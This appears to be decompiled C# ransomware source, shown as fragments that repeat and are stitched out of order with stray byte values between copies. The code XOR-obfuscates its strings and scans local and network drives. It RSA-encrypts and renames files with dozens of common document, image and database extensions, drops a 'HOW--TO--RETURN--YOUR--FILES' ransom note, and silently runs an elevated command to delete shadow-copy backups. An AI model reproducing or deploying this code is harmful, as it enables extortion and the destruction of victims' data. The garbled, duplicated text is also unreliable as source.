0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } , 0xc5, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } , 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 